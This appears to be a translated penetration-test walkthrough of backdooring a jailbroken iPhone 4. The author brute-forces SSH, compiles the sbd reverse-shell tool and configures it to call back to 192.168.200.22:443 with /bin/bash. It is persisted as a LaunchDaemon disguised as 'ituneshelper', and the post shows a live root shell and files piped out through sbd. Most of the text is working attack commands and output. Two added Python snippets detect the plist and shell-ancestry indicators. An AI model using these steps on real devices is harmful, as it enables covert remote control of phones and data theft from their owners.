Editor's note: sbd is a small backdoor with fairly strong encryption, the essential item for home, travel, murder and robbery (it is a security testing tool; do not use it illegally). Download: http://packetstormsecurity.org/files/download/34401/sbd-1.36.tar.gz
During a penetration test, I obtained access to a (jailbroken) iPhone 4 by brute-forcing SSH. I then connected to the device over SSH and installed a persistent TCP reverse-connect backdoor (sbd-1.36 by Michel Blomgren).
All the steps in detail:
1. Install iphone-gcc:
iphone4:~ root# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
iphone4:~ root# apt-get update
Get:1 http://repo.biteyourapple.net ./ Release.gpg [490B]
Hit http://cydia.zodttd.com stable Release.gpg
Hit http://apt.saurik.com ios/675.00 Release.gpg
Hit http://repo.insanelyi.com ./ Release.gpg
...
iphone4:~ root# apt-get install iphone-gcc
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Setting up ldid (610-5) ...
Setting up com.sull.iphone-gccheaders (1.0-11) ...
Setting up com.sull.fake-libgcc (1.0-2) ...
Setting up iphone-gcc (4.2-20080604-1-8) ...
iphone4:~/sbd-1.36 root# apt-get install make
Reading package lists... Done
Building dependency tree
Reading state information... Done
...
Unpacking make (from .../make_3.81-2_iphoneos-arm.deb) ...
Setting up make (3.81-2) ...
2. Download the sbd backdoor:
iphone4:~ root# wget http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
--2012-04-23 23:50:43--  http://packetstorm.tacticalflex.com/UNIX/netcat/sbd-1.36.tar.gz
Resolving packetstorm.tacticalflex.com... 173.160.180.156
Connecting to packetstorm.tacticalflex.com|173.160.180.156|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 84093 (82K) [application/x-gzip]
Saving to: `sbd-1.36.tar.gz'

100%[======================================>] 84,093      66.3K/s   in 1.2s

2012-04-23 23:50:45 (66.3 KB/s) - `sbd-1.36.tar.gz' saved [84093/84093]

iphone4:~ root# tar -zxvf sbd-1.36.tar.gz
sbd-1.36/
sbd-1.36/sbd.c
sbd-1.36/doexec.c
sbd-1.36/pel.c
sbd-1.36/aes.c
sbd-1.36/sha1.c
sbd-1.36/socket_code.h
sbd-1.36/pel.h
sbd-1.36/aes.h
sbd-1.36/sha1.h
sbd-1.36/sbd.h
sbd-1.36/doexec_unix.h
sbd-1.36/doexec_win32.h
sbd-1.36/readwrite.h
sbd-1.36/misc.h
sbd-1.36/Makefile
sbd-1.36/mktarball.sh
sbd-1.36/README
sbd-1.36/COPYING
sbd-1.36/CHANGES
sbd-1.36/binaries/
sbd-1.36/binaries/sbd.exe
sbd-1.36/binaries/sbdbg.exe
iphone4:~ root# cd sbd-1.36
iphone4:~/sbd-1.36 root# ls -al
total 224
drwx------  3 1000  100    748 Sep 17  2004 ./
drwxr-x---  6 root  wheel  272 Apr 23 23:50 ../
-rw-------  1 1000  100   1876 Sep 17  2004 CHANGES
-rw-------  1 1000  100  18007 Jun  8  2004 COPYING
-rw-------  1 1000  100   2176 Jun 20  2004 Makefile
-rw-------  1 1000  100   4880 Sep 11  2004 README
-rw-------  1 1000  100  31370 Jun 12  2004 aes.c
-rw-------  1 1000  100    549 Jun 11  2004 aes.h
drwx------  2 1000  100    136 Sep 11  2004 binaries/
-rw-------  1 1000  100     77 Jun  2  2004 doexec.c
-rw-------  1 1000  100   7114 Sep 11  2004 doexec_unix.h
-rw-------  1 1000  100  19060 Sep  8  2004 doexec_win32.h
-rw-------  1 1000  100  14968 Sep  9  2004 misc.h
-rwx------  1 1000  100    624 Jun 13  2004 mktarball.sh*
-rw-------  1 1000  100  13381 Sep  8  2004 pel.c
-rw-------  1 1000  100    898 Sep  9  2004 pel.h
-rw-------  1 1000  100   9829 Sep  9  2004 readwrite.h
-rw-------  1 1000  100  20557 Sep  9  2004 sbd.c
-rw-------  1 1000  100   2014 Jun  8  2004 sbd.h
-rw-------  1 1000  100   8900 Jun  2  2004 sha1.c
-rw-------  1 1000  100    436 Jun  2  2004 sha1.h
-rw-------  1 1000  100  20800 Sep  9  2004 socket_code.h
3. Configure sbd before compiling (I configured sbd as a daemon; all the parameters, including the callback IP, port, password, encryption settings and so on, live in this header):
iphone4:~/sbd-1.36 root# cat sbd.h
#define SOURCE_PORT 0
#define CONVERT_TO_CRLF 0
#define ENCRYPTION 1
#define SHARED_SECRET "password"
#define QUIET 0
#define VERBOSE 0
#define DAEMONIZE 0
#define HIGHLIGHT_INCOMING 0
#define HIGHLIGHT_PREFIX "\x1b[0;32m"
#define HIGHLIGHT_SUFFIX "\x1b[0m"
#define SEPARATOR_BETWEEN_PREFIX_AND_DATA ": "
#define RUN_ONLY_ONE_INSTANCE 0
#define INSTANCE_SEMAPHORE "shadowinteger_bd_semaphore"

/* connect to 192.168.200.22 on port 443 (https) and serve /bin/bash.
 * reconnect every 10 seconds. */
#define DOLISTEN 0
#define HOST "192.168.200.22"
#define PORT 443
#define RESPAWN_ENABLED 1
#define RESPAWN_INTERVAL 10
#define EXECPROG "/bin/bash"
You can then optionally use the following arguments instead:
host: ./sbd -l -p 443 -k 1234
server: ./sbd -r 10 -q -e /bin/sh -c on -k 1234 -D on 192.168.200.22 443
4. Compiling:
iphone4:~/sbd-1.36 root# make
usage:
  make unix     - Linux, NetBSD, FreeBSD, OpenBSD
  make sunos    - SunOS (Solaris)
  make win32    - native win32 console app (w/ Cygwin + MinGW)
  make win32bg  - create a native win32 no-console app (w/ Cygwin + MinGW)
  make win32bg CFLAGS=-DSTEALTH - stealthy no-console app
  make mingw    - native win32 console app (w/ MinGW MSYS)
  make mingwbg  - native win32 no-console app (w/ MinGW MSYS)
  make cygwin   - Cygwin console app
  make darwin   - Darwin
iphone4:~/sbd-1.36 root# make darwin
rm -f sbd sbd.exe *.o core
gcc -Wall -Wshadow -O2 -o sbd pel.c aes.c sha1.c doexec.c sbd.c
strip sbd
iphone4:~/sbd-1.36 root# ls -al sbd
-rwxr-xr-x 1 root 100 55296 Apr 24 02:10 sbd*
5. Configure the daemon (for persistence):
iphone4:~/sbd-1.36 root# cp sbd /usr/bin/ituneshelper
iphone4:~/sbd-1.36 root# cd /Library/LaunchDaemons/
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x  2 root wheel 136 Apr 24 02:02 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r--  1 root wheel 847 Feb 15  2011 com.openssh.sshd.plist
iphone4:/Library/LaunchDaemons root# cat << EOF >> com.ituneshelper.start.plist
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.ituneshelper.start</string>
    <key>ProgramArguments</key>
    <array>
        <string>/usr/bin/ituneshelper</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
    <key>StartInterval</key>
    <integer>1</integer>
</dict>
</plist>
EOF
iphone4:/Library/LaunchDaemons root# ls -al
total 16
drwxr-xr-x  2 root wheel 136 Apr 24 02:15 ./
drwxrwxr-x 18 root admin 816 Dec 31 15:38 ../
-rw-r--r--  1 root wheel 404 Apr 24 02:01 com.ituneshelper.start.plist
-rw-r--r--  1 root wheel 847 Feb 15  2011 com.openssh.sshd.plist
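From the defender's side, the persistence in step 5 leaves a new plist in /Library/LaunchDaemons whose shape is itself an indicator: a label absent from the device baseline, a one-second StartInterval (a keep-alive loop rather than a scheduled task) and a binary outside the directories the system daemons live in. The following is an added example, not code from the original post: it audits one such plist with Python's plistlib. The baseline label set and the daemon directory list are assumptions drawn from the listings in this post.

```python
import plistlib

# Constructed copy of the plist written to /Library/LaunchDaemons in step 5.
SUSPECT_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key><string>com.ituneshelper.start</string>
<key>ProgramArguments</key><array><string>/usr/bin/ituneshelper</string></array>
<key>RunAtLoad</key><true/>
<key>StartInterval</key><integer>1</integer>
</dict>
</plist>"""

# Assumption: the pre-intrusion baseline (the listing above shows only sshd).
BASELINE_LABELS = {"com.openssh.sshd"}
# Assumption: where the legitimate daemons in this post's ps listing live.
DAEMON_DIRS = ("/System/Library/", "/usr/libexec/", "/usr/sbin/")
# A job re-launched every few seconds is a keep-alive loop, not a scheduled task.
MIN_SANE_INTERVAL = 60

def audit_launch_daemon(plist_bytes, baseline=BASELINE_LABELS):
    """Return indicator strings for one LaunchDaemons plist (empty list = clean)."""
    d = plistlib.loads(plist_bytes)
    label = d.get("Label", "")
    program = (d.get("ProgramArguments") or [d.get("Program", "")])[0]
    findings = []
    if label not in baseline:
        findings.append(f"label {label!r} not in baseline")
    interval = d.get("StartInterval")
    if interval is not None and interval < MIN_SANE_INTERVAL:
        findings.append(f"StartInterval={interval}s respawn loop")
    # Path check only; hashing the referenced binary against a known-good
    # manifest is the stronger test when the device image is available.
    if program and not program.startswith(DAEMON_DIRS):
        findings.append(f"program {program} outside known daemon dirs")
    return findings
```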
6. Connect (from the Linux box):
root@coresec:~# uname -an
Linux coresec 3.0.0-17-generic #30-Ubuntu SMP Thu Mar 8 20:45:39 UTC 2012 x86_64 x86_64 x86_64 GNU/Linux
root@coresec:~# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0c:29:03:72:5e
          inet addr:192.168.200.22  Bcast:192.168.200.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe03:725e/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:14741 errors:0 dropped:0 overruns:0 frame:0
          TX packets:10042 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:20159805 (20.1 MB)  TX bytes:720669 (720.6 KB)
root@coresec:/home/enzo/sbd-1.36# ./sbd -l -p 443 -k password
id
uid=0(root) gid=0(wheel) groups=0(wheel)
/bin/bash -i
bash: no job control in this shell
bash-4.0# ps -ef
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 19 1 0 0:00.00 ?? 0:00.95 /usr/libexec/UserEventAgent -l System
0 21 1 0 0:00.00 ?? 0:00.68 /usr/sbin/notifyd
0 23 1 0 0:00.00 ?? 0:00.41 /usr/sbin/syslogd
0 25 1 0 0:00.00 ?? 0:01.64 /usr/libexec/configd
25 27 1 0 0:00.00 ?? 0:01.53 /System/Library/Frameworks/CoreTelephony.framework/Support/CommCenterClassic
501 29 1 0 0:00.00 ?? 0:12.27 /System/Library/CoreServices/SpringBoard.app/SpringBoard
501 33 1 0 0:00.00 ?? 0:00.60 /System/Library/PrivateFrameworks/ManagedConfiguration.framework/Support/profiled
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 43 1 0 0:00.00 ?? 0:00.56 /System/Library/CoreServices/powerd.bundle/powerd
0 49 1 0 0:00.00 ?? 0:19.04 /usr/libexec/locationd
0 55 1 0 0:00.00 ?? 0:00.21 /usr/bin/sbsettingsd
0 56 1 0 0:00.00 ?? 0:00.69 /usr/sbin/wifid
501 58 1 0 0:00.00 ?? 0:00.46 /System/Library/PrivateFrameworks/Ubiquity.framework/Versions/A/Support/ubd
501 71 1 0 0:00.00 ?? 0:01.99 /usr/sbin/mediaserverd
501 72 1 0 0:00.00 ?? 0:00.13 /System/Library/PrivateFrameworks/MediaRemote.framework/Support/mediaremoted
65 73 1 0 0:00.00 ?? 0:00.27 /usr/sbin/mDNSResponder -launchd
501 75 1 0 0:00.00 ?? 0:00.87 /System/Library/PrivateFrameworks/IMCore.framework/imagent.app/imagent
501 76 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/IAP.framework/Support/iapd
0 78 1 0 0:00.00 ?? 0:00.13 /usr/libexec/fseventsd
501 79 1 0 0:00.00 ?? 0:00.92 /usr/sbin/fairplayd.N90
501 80 1 0 0:00.00 ?? 0:01.76 /System/Library/PrivateFrameworks/DataAccess.framework/Support/dataaccessd
501 86 1 0 0:00.00 ?? 0:00.45 /System/Library/PrivateFrameworks/ApplePushService.framework/apsd
501 87 1 0 0:00.00 ?? 0:00.34 /System/Library/PrivateFrameworks/AggregateDictionary.framework/Support/aggregated
501 92 1 0 0:00.00 ?? 0:00.39 /usr/sbin/BTServer
501 93 1 0 0:00.00 ?? 0:00.99 /usr/sbin/aosnotifyd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
501 260 1 0 0:00.00 ?? 0:01.94 /Applications/MobileMail.app/MobileMail
501 261 1 0 0:00.00 ?? 0:00.75 /Applications/MobilePhone.app/MobilePhone
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef
bash-4.0# uname -an
Darwin iphone4 11.0.0 Darwin Kernel Version 11.0.0: Tue Nov 1 20:33:58 PDT 2011; root:xnu-1878.4.46~1/RELEASE_ARM_S5L8930X iPhone3,1 arm N90AP Darwin
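The process listing above is the detection artifact for this kind of implant: a launchd child with PPID 1 (/usr/bin/ituneshelper, PID 94) owns a bash, which owns an interactive /bin/bash -i. This added example, which is not part of the original post, parses ps -ef output into a process tree and reports every shell whose ancestry reaches launchd without passing through sshd. The sample rows are constructed from the listing above, and the sshd allowlist is an assumption about how a shell is legitimately reached on this device.

```python
import re

# Constructed sample: a subset of the ps -ef rows from the session above.
PS_SAMPLE = """\
UID PID PPID C STIME TTY TIME CMD
0 1 0 0 0:00.00 ?? 0:00.95 /sbin/launchd
0 37 1 0 0:00.00 ?? 0:00.81 /usr/libexec/lockdownd
0 94 1 0 0:00.00 ?? 0:00.02 /usr/bin/ituneshelper
0 157 1 0 0:00.00 ?? 0:00.11 /usr/libexec/networkd
0 286 94 0 0:00.00 ?? 0:00.03 bash
0 300 286 0 0:00.00 ?? 0:00.03 /bin/bash -i
0 303 300 0 0:00.00 ?? 0:00.01 ps -ef
"""

SHELL_RE = re.compile(r"^(?:/bin/|/usr/bin/)?(?:ba|z|da)?sh(?:\s|$)")
# Assumption: on this device a shell is legitimately reached only via sshd.
EXPECTED_SHELL_PARENTS = ("/usr/sbin/sshd", "sshd")

def parse_ps(text):
    """Map pid -> (ppid, cmd) from `ps -ef` output in the BSD column layout."""
    procs = {}
    for line in text.splitlines()[1:]:          # skip the header row
        fields = line.split(None, 7)            # CMD keeps its own spaces
        if len(fields) == 8:
            procs[int(fields[1])] = (int(fields[2]), fields[7])
    return procs

def ancestry(procs, pid):
    """Walk from pid up to launchd, returning [(pid, cmd), ...]."""
    chain = []
    while pid in procs:
        chain.append((pid, procs[pid][1]))
        pid = procs[pid][0]
    return chain

def suspicious_shells(procs):
    """Shells whose ancestry hits launchd without sshd: (pid, cmd, daemon)."""
    findings = []
    for pid, (_, cmd) in procs.items():
        if not SHELL_RE.match(cmd):
            continue
        chain = ancestry(procs, pid)
        if any(c.split()[0] in EXPECTED_SHELL_PARENTS for _, c in chain):
            continue
        # The launchd child (PPID 1) that ultimately owns this shell.
        daemon = next(((p, c) for p, c in chain if procs[p][0] == 1), None)
        findings.append((pid, cmd, daemon))
    return findings
```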
7. If you want to transfer files between yourself and the controlled iPhone, you can use sbd with the following arguments:
root@coresec:/home/enzo/sbd-1.36# sbd -l -p 12345 -k secret > output.file
iphone4:~/sbd-1.36 root# cat /.../.../input.file | ./sbd -k secret 192.168.200.22 12345
8. Removing the backdoor is just as simple:
iphone4:/Library/LaunchDaemons root# rm -rf com.ituneshelper.start.plist
iphone4:/Library/LaunchDaemons root# rm -rf /usr/bin/ituneshelper